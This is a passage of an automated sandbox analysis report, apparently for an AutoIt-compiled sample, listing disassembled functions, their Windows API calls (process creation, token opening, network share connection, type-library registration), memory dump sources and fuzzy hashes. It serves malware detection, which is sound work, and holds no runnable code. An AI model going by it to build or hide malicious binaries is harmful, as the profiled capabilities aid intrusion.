                                                                  Similarity
                                                                  • API ID: CounterPerformanceQuerySleep
                                                                  • String ID:
                                                                  • API String ID: 2875609808-0
                                                                  • Opcode ID: 9f1780ecda147ff8e623db9489a7d90f864489b9474f0c53ab46a21a2fc9fdae
                                                                  • Instruction ID: 2870d6afe32912a13f84e8b8c8e6fa8cf258e8bc069962579e82427ec152a477
                                                                  • Opcode Fuzzy Hash: 9f1780ecda147ff8e623db9489a7d90f864489b9474f0c53ab46a21a2fc9fdae
                                                                  • Instruction Fuzzy Hash: F4113632D0891DEBCF00DFA6D888BEEBB78BB49712F404495EA45B6240CA709594DBA1
                                                                  Function 0094D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0094D84D
                                                                  • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0094D864
                                                                  • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0094D879
                                                                  • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0094D897
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Type$Register$FileLoadModuleNameUser
                                                                  • String ID:
                                                                  • API String ID: 1352324309-0
                                                                  • Opcode ID: 8ec343935a2460950185dee6f7d8916da4b86f1300e50ae84c22c809a6a2c79d
                                                                  • Instruction ID: 0a21cc576eac678620a19f0325a3754015b53a889d30b85cb1c0655193d834f7
                                                                  • Opcode Fuzzy Hash: 8ec343935a2460950185dee6f7d8916da4b86f1300e50ae84c22c809a6a2c79d
                                                                  • Instruction Fuzzy Hash: E7116179606304DBE7308F50DC1DFA3BBBCEF00B00F108969A51AD6650D7B4E549ABA1
                                                                  Function 00926FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                  • String ID:
                                                                  • API String ID: 3016257755-0
                                                                  • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                  • Instruction ID: 93b54a3be3f0e69a53899e2bbe2c1afd28b0c1e686e26ef395a09015635717bd
                                                                  • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                  • Instruction Fuzzy Hash: 42018C3208815ABBCF125FC4EC02CEE7F66BB18350F488415FE1868034C236C9B5AB91
                                                                  Function 0097B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 0097B2E4
                                                                  • ScreenToClient.USER32(?,?), ref: 0097B2FC
                                                                  • ScreenToClient.USER32(?,?), ref: 0097B320
                                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0097B33B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                  • String ID:
                                                                  • API String ID: 357397906-0
                                                                  • Opcode ID: 368cab6b65918a5d29c2eff58f7999fc9e76f6080c56fbf1e10c26447484d066
                                                                  • Instruction ID: 3dd6282d1a50bab0dfff8fd980cbfd83e0068f4f8dc98284e11b8b8a3c44d796
                                                                  • Opcode Fuzzy Hash: 368cab6b65918a5d29c2eff58f7999fc9e76f6080c56fbf1e10c26447484d066
                                                                  • Instruction Fuzzy Hash: CA114675D0420DEFDB41DF99C844AEEBBB9FB08310F108166E914E3220D735AA559F50
                                                                  Function 0097B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0097B644
                                                                  • _memset.LIBCMT ref: 0097B653
                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,009B6F20,009B6F64), ref: 0097B682
                                                                  • CloseHandle.KERNEL32 ref: 0097B694
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                  • String ID:
                                                                  • API String ID: 3277943733-0
                                                                  • Opcode ID: abdab458516fa89e1d06db4d7f921379617d8792e4a042776fd03980c479b75e
                                                                  • Instruction ID: 14c2df24409ee96eed3567434b65ca5331ab487b6d994d0d62b4cf72c58fa57b
                                                                  • Opcode Fuzzy Hash: abdab458516fa89e1d06db4d7f921379617d8792e4a042776fd03980c479b75e
                                                                  • Instruction Fuzzy Hash: F9F05EB36543047AE3102B61BD06FBB3A9CEB083A5F004020FA0CEA192D7796C10D7A8
                                                                  Function 00956BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00956BE6
                                                                    • Part of subcall function 009576C4: _memset.LIBCMT ref: 009576F9
                                                                  • _memmove.LIBCMT ref: 00956C09
                                                                  • _memset.LIBCMT ref: 00956C16
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00956C26
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                  • String ID:
                                                                  • API String ID: 48991266-0
                                                                  • Opcode ID: 883c88e2cf006e665760522a04b7cd4a99ecdca1e57036ea0c890e640459c661
                                                                  • Instruction ID: ddcbb28d0445f1adb61b6ee81e09dda9af179916121db179f192bd1d1dbdbc92
                                                                  • Opcode Fuzzy Hash: 883c88e2cf006e665760522a04b7cd4a99ecdca1e57036ea0c890e640459c661
                                                                  • Instruction Fuzzy Hash: 52F0543A204104ABCF016F55EC85B8ABF29EF85321F048061FE0CAE267C731E951DBB4
                                                                  Function 008F2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSysColor.USER32(00000008), ref: 008F2231
                                                                  • SetTextColor.GDI32(?,000000FF), ref: 008F223B
                                                                  • SetBkMode.GDI32(?,00000001), ref: 008F2250
                                                                  • GetStockObject.GDI32(00000005), ref: 008F2258
                                                                  • GetWindowDC.USER32(?,00000000), ref: 0092BE83
                                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 0092BE90
                                                                  • GetPixel.GDI32(00000000,?,00000000), ref: 0092BEA9
                                                                  • GetPixel.GDI32(00000000,00000000,?), ref: 0092BEC2
                                                                  • GetPixel.GDI32(00000000,?,?), ref: 0092BEE2
                                                                  • ReleaseDC.USER32(?,00000000), ref: 0092BEED
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                  • String ID:
                                                                  • API String ID: 1946975507-0
                                                                  • Opcode ID: 7488338550c4b7119091f892c660731b18b76b977e3caefa182f8b1491af80b1
                                                                  • Instruction ID: af55ee285c5d042fbe2e7f64a653945f84549bbff97190187e57286033575558
                                                                  • Opcode Fuzzy Hash: 7488338550c4b7119091f892c660731b18b76b977e3caefa182f8b1491af80b1
                                                                  • Instruction Fuzzy Hash: 78E03932218244AADF215F64FC0D7E83B24EB05336F108366FA6DA80E5877149C4EB12
                                                                  Function 00948712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCurrentThread.KERNEL32 ref: 0094871B
                                                                  • OpenThreadToken.ADVAPI32(00000000,?,?,?,009482E6), ref: 00948722
                                                                  • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,009482E6), ref: 0094872F
                                                                  • OpenProcessToken.ADVAPI32(00000000,?,?,?,009482E6), ref: 00948736
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CurrentOpenProcessThreadToken
                                                                  • String ID:
                                                                  • API String ID: 3974789173-0
                                                                  • Opcode ID: 1f0538c2e8a2e9e37be1f26a1e2212f781bbdddd6407b59400364622deb07986
                                                                  • Instruction ID: e78573ae375c562aa8220e4466332d8ae77bb766c1fe9fc24e5d0b498bbc557d
                                                                  • Opcode Fuzzy Hash: 1f0538c2e8a2e9e37be1f26a1e2212f781bbdddd6407b59400364622deb07986
                                                                  • Instruction Fuzzy Hash: 8FE086376292119BD7205FB05D1CF5B3BACEF50BD1F144828F249EA040DA348485D750
                                                                  Function 0094B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 0094B4BE
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: ContainedObject
                                                                  • String ID: AutoIt3GUI$Container
                                                                  • API String ID: 3565006973-3941886329
                                                                  • Opcode ID: 6f30b18e3093632cee5add29cc599c9fe3e0da60f0c16e49ed9374ca11fbf53b
                                                                  • Instruction ID: 6f39da5b38bafa92db3b56e0aea2c1675942850254ae2515a158eaffb528488d
                                                                  • Opcode Fuzzy Hash: 6f30b18e3093632cee5add29cc599c9fe3e0da60f0c16e49ed9374ca11fbf53b
                                                                  • Instruction Fuzzy Hash: CA912570600601AFDB14DF68C885F6ABBE9FF49710F24856DF94ACB6A1DB71E841CB60
                                                                  Function 0095AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0090FC86: _wcscpy.LIBCMT ref: 0090FCA9
                                                                    • Part of subcall function 008F9837: __itow.LIBCMT ref: 008F9862
                                                                    • Part of subcall function 008F9837: __swprintf.LIBCMT ref: 008F98AC
                                                                  • __wcsnicmp.LIBCMT ref: 0095B02D
                                                                  • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0095B0F6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                  • String ID: LPT
                                                                  • API String ID: 3222508074-1350329615
                                                                  • Opcode ID: 3da4a25065fa6a6069cc9e2cee6d819dc63b806fc57c1a171f708a24ea1a37f2
                                                                  • Instruction ID: 77788b59b4b758a18e74c3ddf56d2c129c893c0226a2e009f7a85c1d313c6dd8
                                                                  • Opcode Fuzzy Hash: 3da4a25065fa6a6069cc9e2cee6d819dc63b806fc57c1a171f708a24ea1a37f2
                                                                  • Instruction Fuzzy Hash: 8961A471A04219AFCB14DFA9D891FBEB7B8FF48310F104069F956AB291D770AE84CB51
                                                                  Function 00902957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Sleep.KERNEL32(00000000), ref: 00902968
                                                                  • GlobalMemoryStatusEx.KERNEL32(?), ref: 00902981
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemorySleepStatus
                                                                  • String ID: @
                                                                  • API String ID: 2783356886-2766056989
                                                                  • Opcode ID: b7ec982fc1d9b1b6df14b96818d8230d010f7491db611f5f1cc923866c29fecd
                                                                  • Instruction ID: db596fd7c9bd3e3b21d28cd1a57cb24ad8cb5e392859a1fe4c993d545e8c12e9
                                                                  • Opcode Fuzzy Hash: b7ec982fc1d9b1b6df14b96818d8230d010f7491db611f5f1cc923866c29fecd
                                                                  • Instruction Fuzzy Hash: F85149724187489BD720EF24D886BAFBBE8FF85344F42485DF2D8810A1DB318569CB67
                                                                  Function 00959734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 008F4F0B: __fread_nolock.LIBCMT ref: 008F4F29
                                                                  • _wcscmp.LIBCMT ref: 00959824
                                                                  • _wcscmp.LIBCMT ref: 00959837
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscmp$__fread_nolock
                                                                  • String ID: FILE
                                                                  • API String ID: 4029003684-3121273764
                                                                  • Opcode ID: 90aec90ef5f027637790acf8a6063f50cb53539653990bafacbc7d1521a7da80
                                                                  • Instruction ID: fda292729a31b37378182d4a1c57634df2ad554f4dd15238256c3646fc31fcb1
                                                                  • Opcode Fuzzy Hash: 90aec90ef5f027637790acf8a6063f50cb53539653990bafacbc7d1521a7da80
                                                                  • Instruction Fuzzy Hash: 7941D931A0421DBAEF21DBA5CC45FEFB7BDEF85710F00046AFA05E7181DA7199048B61
                                                                  Function 0096258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0096259E
                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 009625D4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: CrackInternet_memset
                                                                  • String ID: |
                                                                  • API String ID: 1413715105-2343686810
                                                                  • Opcode ID: 06405bd8a00a38f18ca69353aa9142e6ca680c317f20a73aebdd1522f8ec04f1
                                                                  • Instruction ID: 2a32aebc2d8a7605f6b6fb18ca8425ce1b9c9f70481d29378f22c7576a73dd50
                                                                  • Opcode Fuzzy Hash: 06405bd8a00a38f18ca69353aa9142e6ca680c317f20a73aebdd1522f8ec04f1
                                                                  • Instruction Fuzzy Hash: 8331F471814119EBDF11AFA4CC85EEEBFB8FF08310F10006AFA15A6162EA355966DB61
                                                                  Function 00977A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001132,00000000,?), ref: 00977B61
                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00977B76
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID: '
                                                                  • API String ID: 3850602802-1997036262
                                                                  • Opcode ID: 333b890c33ac3f2ba371d8ee13942928574b1024821d6315328c5c8cfb23c891
                                                                  • Instruction ID: 3fd2e8ec6edd75bc3484cd1f570b44be6005b0a7c86c4479d4a6bc18d8d29814
                                                                  • Opcode Fuzzy Hash: 333b890c33ac3f2ba371d8ee13942928574b1024821d6315328c5c8cfb23c891
                                                                  • Instruction Fuzzy Hash: 58411975A053099FDB14CFA4C981BEABBB9FF08300F10456AE908EB351D770A951CF90
                                                                  Function 00976A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • DestroyWindow.USER32(?,?,?,?), ref: 00976B17
                                                                  • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00976B53
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: Window$DestroyMove
                                                                  • String ID: static
                                                                  • API String ID: 2139405536-2160076837
                                                                  • Opcode ID: ee1d11ed429fb12a29a07c3631b49f89bfffda76c1e16b35b10261a0a941d198
                                                                  • Instruction ID: 6ead2ab677902119114e99fb388685aca4dfa1d13afb7b58b94c802cc2c48dab
                                                                  • Opcode Fuzzy Hash: ee1d11ed429fb12a29a07c3631b49f89bfffda76c1e16b35b10261a0a941d198
                                                                  • Instruction Fuzzy Hash: 10318E72210608AEDB149F68CC91BBB77ADFF49760F10C619F9A9D7190DA30AC81DB60
                                                                  Function 009528A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 00952911
                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0095294C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_8f0000_01152-11-12-24.jbxd
                                                                  Similarity
                                                                  • API ID: InfoItemMenu_memset
                                                                  • String ID: 0
                                                                  • API String ID: 2223754486-4108050209
                                                                  • Opcode ID: 18c836de4614e142e331fb519f59a13e6d24b04667081de7f87c845484d4f028
                                                                  • Instruction ID: 98458777201de20dffd1e23c3ad1a281e13879d5c613ff6ea6ae41d2c814236d
                                                                  • Opcode Fuzzy Hash: 18c836de4614e142e331fb519f59a13e6d24b04667081de7f87c845484d4f028
                                                                  • Instruction Fuzzy Hash: F331D7756003099BDB24CF9ADA45BEEBBFCEF46351F140019ED85A62A0D7709948CB51
                                                                  Function 009639E9 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 84COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __snwprintf.LIBCMT ref: 00963A66
                                                                    • Part of subcall function 008F7DE1: _memmove.LIBCMT ref: 008F7E22
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1282308004.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                  • Associated: 00000000.00000002.1282271679.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.000000000097F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1282790596.00000000009A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283228260.00000000009AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1283277262.00000000009B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
